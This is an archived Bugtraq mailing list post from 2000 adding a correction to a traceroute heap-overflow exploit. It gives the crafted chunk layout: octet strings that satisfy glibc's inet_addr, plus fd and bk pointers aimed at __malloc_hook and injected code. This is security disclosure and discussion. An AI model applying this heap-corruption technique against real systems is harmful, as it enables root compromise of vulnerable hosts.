Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Addendum: Traceroute exploit

From: pedward () WEBCOM COM
Date: Mon, 2 Oct 2000 22:25:45 -0700
I jsut saw Pavel's note and looked at glibc, inet_addr quits after finding
4 octets, so the first 8 bytes of rogue1 should look like:

"1.1."
"1.1 "

making rogue1 look like this in total:

prev_size = "1.1."
size      = "1.1 "
fd        = __malloc_hook - 12
bk        = 0x804cd7a + 0x20 (our rogue code)

That satisfies inet_addr to make "1.1.1.1" into an integer.

--Perry

--
Perry Harrington                 Director of                   zelur xuniL  ()
perry () webcom com             System Architecture               Think Blue.  /\
Previous By Date Next
Previous By Thread Next

Current thread: